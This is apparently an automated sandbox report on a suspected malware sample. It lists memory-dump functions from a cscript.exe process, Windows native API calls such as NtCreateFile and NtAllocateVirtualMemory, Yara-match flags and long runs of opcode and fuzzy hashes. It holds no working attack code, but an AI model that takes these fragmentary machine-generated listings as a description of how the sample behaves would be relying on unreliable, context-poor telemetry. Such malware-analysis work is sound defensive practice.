                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9770, Relevance: .0, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ca4c05be5725980e2cf8f77191fca1c06f70a81f9e6170820fd7b03b147cea8d
                                                                                                                    • Instruction ID: e298e9f8247f31dd1f18446fef8678d144eedb0012f660e1ef3b3369b2fbee46
                                                                                                                    • Opcode Fuzzy Hash: ca4c05be5725980e2cf8f77191fca1c06f70a81f9e6170820fd7b03b147cea8d
                                                                                                                    • Instruction Fuzzy Hash: D190026120508442D200656A5408A16000597D0385F61D021A5054595DC6758851F171
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00ADA770, Relevance: .0, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5d52af09b14154c74095699cc90c6808cd63cc14144340af778c4c00c180cd8f
                                                                                                                    • Instruction ID: e68e2e40f0960131b7c4cbc4f047720cde48b4884f5ba947b44612856d445f75
                                                                                                                    • Opcode Fuzzy Hash: 5d52af09b14154c74095699cc90c6808cd63cc14144340af778c4c00c180cd8f
                                                                                                                    • Instruction Fuzzy Hash: 8090027520508442D600656A5804A97000597D0385F61D421A441459CD86948861F161
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD9670, Relevance: .0, Instructions: 2COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                    • Instruction ID: 992fc580f2f5fe9407c6e87ccd4f82f564225015843d67cc5851f064af1b8f61
                                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B2FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 53%
                                                                                                                    			E00B2FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00ADCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                    0x00b2fdda
                                                                                                                    0x00b2fde2
                                                                                                                    0x00b2fde5
                                                                                                                    0x00b2fdec
                                                                                                                    0x00b2fdfa
                                                                                                                    0x00b2fdff
                                                                                                                    0x00b2fe0a
                                                                                                                    0x00b2fe0f
                                                                                                                    0x00b2fe17
                                                                                                                    0x00b2fe1e
                                                                                                                    0x00b2fe19
                                                                                                                    0x00b2fe19
                                                                                                                    0x00b2fe19
                                                                                                                    0x00b2fe20
                                                                                                                    0x00b2fe21
                                                                                                                    0x00b2fe22
                                                                                                                    0x00b2fe25
                                                                                                                    0x00b2fe40

                                                                                                                    APIs
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B2FDFA
                                                                                                                    Strings
                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B2FE01
                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B2FE2B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                    • API String ID: 885266447-3903918235
                                                                                                                    • Opcode ID: 063585bc963aab82c02d5f91078269074a4dfaa03b61c8c5ffdcba543359a3a3
                                                                                                                    • Instruction ID: dc1f84e0e8c789468ea75481fdef6c3f89251d581c9f2271e768c37f0fe86eac
                                                                                                                    • Opcode Fuzzy Hash: 063585bc963aab82c02d5f91078269074a4dfaa03b61c8c5ffdcba543359a3a3
                                                                                                                    • Instruction Fuzzy Hash: 65F0F672640611BFD6212A45EC06F33BBAAEB44730F250365F628561E1DA62FC2097F0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Analysis Process: cscript.exe PID: 1632 Parent PID: 5880 cscript.exeCOMMON

                                                                                                                    Executed Functions

                                                                                                                    Function 005781D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00573BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00573BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0057821D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID: .z`
                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                    • Instruction ID: 9b09947dbeeebd7993b53fe2514f2c0dd9c36045461dd8c97f145e773d480f6d
                                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                    • Instruction Fuzzy Hash: E1F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 005781CE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00573BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00573BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0057821D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID: .z`
                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                    • Opcode ID: 51061a58dcd882da688b26defca0ab32f93f88b08796704616724eea9622ddd5
                                                                                                                    • Instruction ID: afd71150b0557c85287a4e597fe047108b5de7429ea1b9028dfbf387a785a7b8
                                                                                                                    • Opcode Fuzzy Hash: 51061a58dcd882da688b26defca0ab32f93f88b08796704616724eea9622ddd5
                                                                                                                    • Instruction Fuzzy Hash: 0AF0CFB2240108AFCB18CF88DD84EEB37A9BF8C354F158248FA0DA7240D630E811CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0057827A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:W,FFFFFFFF,?,b=W,?,00000000), ref: 005782C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID: !:W
                                                                                                                    • API String ID: 2738559852-375975915
                                                                                                                    • Opcode ID: 4f06464f171db7dfd99c1a611f433d184ec53262f360102c0d624b4100b6e755
                                                                                                                    • Instruction ID: b71c40a74c49a0f642ddcb66f9a0d5b8251caea8601544833cb3facb26febfe2
                                                                                                                    • Opcode Fuzzy Hash: 4f06464f171db7dfd99c1a611f433d184ec53262f360102c0d624b4100b6e755
                                                                                                                    • Instruction Fuzzy Hash: DFF0E7B6600118ABCB14DF99DC85EEB77A9EF9C354F118258FA1DA7241DA30E811CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00578280, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:W,FFFFFFFF,?,b=W,?,00000000), ref: 005782C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID: !:W
                                                                                                                    • API String ID: 2738559852-375975915
                                                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                    • Instruction ID: 638514bbf1cd230c50ec78acd274ba5c798a6d7dd84fb252eb661bb0292680f9
                                                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                    • Instruction Fuzzy Hash: 09F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158249BA1D97241DA30E8118BA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00578300, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtClose.NTDLL(@=W,?,?,00573D40,00000000,FFFFFFFF), ref: 00578325
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close
                                                                                                                    • String ID: @=W
                                                                                                                    • API String ID: 3535843008-272422971
                                                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                    • Instruction ID: f2463f23762a85a4ca8182f4beecc533bca5f5a3b65aa06d8ece732bfae9f422
                                                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                    • Instruction Fuzzy Hash: B1D012752402146BD710EF98DC49EA77B5CEF84750F154455BA1C5B242C570F90086E0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 005783AB, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00562D11,00002000,00003000,00000004), ref: 005783E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: 0dce1c64bda30577b5c58f5140c662771335f0adec20b33251f668859a7dbef2
                                                                                                                    • Instruction ID: 37359f307e7e3cb84c1158abfebe265511863854cc46952e909895e433c16587
                                                                                                                    • Opcode Fuzzy Hash: 0dce1c64bda30577b5c58f5140c662771335f0adec20b33251f668859a7dbef2
                                                                                                                    • Instruction Fuzzy Hash: 5CF0F8B2244219AFCB14DF89DC95EEB77A9AF88754F158159FE0897241C670E811CBE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 005783B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00562D11,00002000,00003000,00000004), ref: 005783E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                    • Instruction ID: 51d001758bebca68d6d500557bbee53f01a38f1bbdac06e41b64de475d01add0
                                                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                    • Instruction Fuzzy Hash: 8CF015B2200218ABCB14DF89DC85EAB77ADAF88750F118149BE0897241C630F810CBB0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 7dd649dcec2f8d62407cbd3fdee66f89ba6758a47e36a1a039cd4efd9f81fd43
                                                                                                                    • Instruction ID: 0e08a52fb89bc14d5d5470800ecf897120ef660837a57ea3d1660afb4de9664c
                                                                                                                    • Opcode Fuzzy Hash: 7dd649dcec2f8d62407cbd3fdee66f89ba6758a47e36a1a039cd4efd9f81fd43
                                                                                                                    • Instruction Fuzzy Hash: C19002A120200003620571594414616404A97E0245F51C535E20096E0DC575D8957165
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: ff7492dfbd676754755b418bfea2b821494736f1e2f47b1a93c3079d9b8d8ddc
                                                                                                                    • Instruction ID: 6639fe15766aba551058e7ad68d35820167cbdd3ffe8f5fcfafb523971e53b09
                                                                                                                    • Opcode Fuzzy Hash: ff7492dfbd676754755b418bfea2b821494736f1e2f47b1a93c3079d9b8d8ddc
                                                                                                                    • Instruction Fuzzy Hash: 94900265211000032205B5590704507008697D5395751C535F200A6A0CD671D8656161
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 066fdf986e8639b00bc1bd27a9cc8786f07553a9294365ef7d0be7394ccd2ca2
                                                                                                                    • Instruction ID: a11decfb232dd929d1d9089bf258e065970c22522b2a7909be82cf9ae60b8100
                                                                                                                    • Opcode Fuzzy Hash: 066fdf986e8639b00bc1bd27a9cc8786f07553a9294365ef7d0be7394ccd2ca2
                                                                                                                    • Instruction Fuzzy Hash: 4690027120100842F20071594404B46004597E0345F51C52AA11197A4D8665D8557561
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 4adbf449137ae7469fd7f40b60e66977376087cfa8b429f2356f858d637e330b
                                                                                                                    • Instruction ID: 0f77440b90b5ad50b9c1dff4e79f60990e2b954294149fbc6adb896074b866db
                                                                                                                    • Opcode Fuzzy Hash: 4adbf449137ae7469fd7f40b60e66977376087cfa8b429f2356f858d637e330b
                                                                                                                    • Instruction Fuzzy Hash: 5490027120108802F2107159840474A004597D0345F55C925A54197A8D86E5D8957161
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: eba551eeff3cc6d1e9b4c298174ac78d54cbafcd0b0588cf5786ce25bcf8b69e
                                                                                                                    • Instruction ID: bf86f4ce58ab565883a3094dd4983e85e1dc214f21d955f8218609d1724988a6
                                                                                                                    • Opcode Fuzzy Hash: eba551eeff3cc6d1e9b4c298174ac78d54cbafcd0b0588cf5786ce25bcf8b69e
                                                                                                                    • Instruction Fuzzy Hash: 7790027120504842F24071594404A46005597D0349F51C525A10597E4D9675DD59B6A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 5a2a5b5e4cc97bda126d51bb37bf9f565395f2676993d77498acf85a28ebc311
                                                                                                                    • Instruction ID: 30853b4f360603ea24e65dde666213be8e1249ec47cc286e52ab32ca1184f1d6
                                                                                                                    • Opcode Fuzzy Hash: 5a2a5b5e4cc97bda126d51bb37bf9f565395f2676993d77498acf85a28ebc311
                                                                                                                    • Instruction Fuzzy Hash: CE90027120100802F2807159440464A004597D1345F91C529A101A7A4DCA65DA5D77E1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: c973becb07a33b517a42fda887b4b62ca542e5fcd3bfc9e37cf4813048597545
                                                                                                                    • Instruction ID: 791aaf9799e4ca65864ef2b79c34e17d34040197733228a8c42dc6782693c402
                                                                                                                    • Opcode Fuzzy Hash: c973becb07a33b517a42fda887b4b62ca542e5fcd3bfc9e37cf4813048597545
                                                                                                                    • Instruction Fuzzy Hash: 2890026921300002F2807159540860A004597D1246F91D929A100A6A8CC965D86D6361
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: a3616901aad916f133b2525f8879e90cf85ce5b069874a96dc32bad9b74473f4
                                                                                                                    • Instruction ID: 3a196a4b3acda9473762b40c35ca4b5feb2ac335f71bd01889599f0bc4ae8598
                                                                                                                    • Opcode Fuzzy Hash: a3616901aad916f133b2525f8879e90cf85ce5b069874a96dc32bad9b74473f4
                                                                                                                    • Instruction Fuzzy Hash: D790027131114402F21071598404706004597D1245F51C925A18196A8D86E5D8957162
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 52f3ba7bfe921ba18f4c4a9c10c64db60d0ef9a8ea47bc4766fa000cc3348c8a
                                                                                                                    • Instruction ID: 6375454950c2e7e05464eef2116bb50f46d2fa5988a1af28ca59ec05720c9454
                                                                                                                    • Opcode Fuzzy Hash: 52f3ba7bfe921ba18f4c4a9c10c64db60d0ef9a8ea47bc4766fa000cc3348c8a
                                                                                                                    • Instruction Fuzzy Hash: D690027120100402F20075995408646004597E0345F51D525A60196A5EC6B5D8957171
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: f1f187d30f17e03dfa25f9820175541542e685f0ba73f096dce43364ea8ea566
                                                                                                                    • Instruction ID: 402ff4b54de5457eab60f68aed897a759efb37095a43a567d6c29ab100077a70
                                                                                                                    • Opcode Fuzzy Hash: f1f187d30f17e03dfa25f9820175541542e685f0ba73f096dce43364ea8ea566
                                                                                                                    • Instruction Fuzzy Hash: 12900261242041527645B15944045074046A7E0285B91C526A2409AA0C8576E85AE661
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 12163b0663a185e591bf149b077920e850b30bd28cb68934c62ab06f501fafed
                                                                                                                    • Instruction ID: e1f89b3d760eae7afaa43bac4b8811107b986eb07d8e6d8357f7e70a4dfc7206
                                                                                                                    • Opcode Fuzzy Hash: 12163b0663a185e591bf149b077920e850b30bd28cb68934c62ab06f501fafed
                                                                                                                    • Instruction Fuzzy Hash: 8390027120100413F21171594504707004997D0285F91C926A14196A8D96A6D956B161
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                                                                                                                    • Associated: 00000012.00000002.495174074.000000000496B000.00000040.00000001.sdmp Download File
                                                                                                                    • Associated: 00000012.00000002.495188587.000000000496F000.00000040.00000001.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 28f8160dbcce278216b03af2453d972fa21d49cde0a75590d6411397aff6913e
                                                                                                                    • Instruction ID: e36499c6b028680cb0338379adb4696845044a5bd049a73a32227fa10aabceba
                                                                                                                    • Opcode Fuzzy Hash: 28f8160dbcce278216b03af2453d972fa21d49cde0a75590d6411397aff6913e
                                                                                                                    • Instruction Fuzzy Hash: A79002A134100442F20071594414B060045D7E1345F51C529E20596A4D8669DC567166
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 048B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
